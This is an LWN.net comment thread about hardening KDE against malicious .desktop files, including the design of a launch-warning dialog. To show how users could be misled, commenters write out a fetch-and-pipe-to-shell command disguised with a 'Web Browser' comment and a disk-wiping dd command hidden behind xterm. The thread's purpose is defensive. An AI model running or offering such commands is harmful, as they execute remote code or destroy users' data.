Nice writeup [LWN.net]

Nice writeup

Posted Feb 26, 2009 4:11 UTC (Thu) by pynm0001 (guest, #18379)
Parent article: Desktop malware risk gets raised and patched

Good writeup, although I'd appreciate if you could s/Pyne/Michael Pyne/ on
the first mention of my name just to give people some context. ;)

I'm still working on tweaking the dialog to remove as much text as
feasible (this is what it looks like on my system right now):

http://purinchu.net/dumping-ground/krun8.png
http://purinchu.net/dumping-ground/krun9.png

which show the dialog with a sane Exec= and a crazy Exec= line,
respectively.

In addition I'll be working on implementing some of the precautions
Alexander already has (namely no custom icons, no sniffing, and showing
.desktop for untrusted .desktop files). KDE 4.2.1 is about to be tagged
so these changes could be backported to 4.2.2 at the earliest, but only
after we have tested everything thoroughly in /trunk, which was broken for
a few people when the initial security was first implemented. David Faure
has been fixing up bugs and oversights here and there since with the
klauncher and KRun changes but everything seems stable at this point.

(Log in to post comments)

Nice writeup

Posted Feb 26, 2009 4:19 UTC (Thu) by jake (editor, #205) [Link]

> Good writeup, although I'd appreciate if you could s/Pyne/Michael Pyne/ on
> the first mention of my name just to give people some context. ;)

Oops, my apologies, fixed now, thanks!

jake

Nice writeup

Posted Feb 26, 2009 22:49 UTC (Thu) by pynm0001 (guest, #18379) [Link]

The default in the code is KDialog::Cancel, and was working last I
checked. :)

Nice writeup

Posted Feb 26, 2009 8:10 UTC (Thu) by tzafrir (subscriber, #11501) [Link]

Suppose I write as a program:

wget http://somewhere/ | sh # (Web Browser)

The dialog will show the command to run, and that command includes the descriptive (not) comment "Web Browser".

Do you suppose enough people would fall for it?

Nice writeup

Posted Feb 26, 2009 22:54 UTC (Thu) by pynm0001 (guest, #18379) [Link]

Do I suppose that people piping code straight from the Internet
into a shell will fall for misleading text in a dialog box? Yes, I
suppose people insane enough to pipe arbitrary code into a running shell
*would* fall for it.

Nice writeup

Posted Feb 27, 2009 5:09 UTC (Fri) by jimparis (subscriber, #38647) [Link]

I think you misunderstood his point, which I read as: What if the "Exec=" command in the .desktop file is misleading? Such that the user reads your dialog box, decides the command looks benign, and then clicks Continue --> but really it was just a cleverly hidden attack.

I don't think you can expect to work around this any more than you can teach users to not trust "https://www.paypal.com.nigerian-scammers-love-you.com". However, it's an argument FOR keeping some text like "If you don't know where this came from or what's going on, click Cancel" in the dialog box.

As an example, your recent dialog (krun8.png) might end up reading:

"This will start the program:
xterm -e 'dd if=/dev/null of=/dev/sda'
If you do not trust this program, press cancel"

and users could think "Oh, well, I don't fully understand what that means, but I do trust xterm, so I'll click OK"

What about KDE 3, which is "still supported"

Posted Mar 6, 2009 15:44 UTC (Fri) by Duncan (guest, #6647) [Link]

What about those of us who still find KDE 4.2 not mature enough for our
needs, who are thus still using KDE 3.5? This is a security issue and KDE
3.5 is after all still supposed to be be supported, yet the only mentions
are for 4.2 and 4.3. Where's the discussion of the fix for 3.5?

Duncan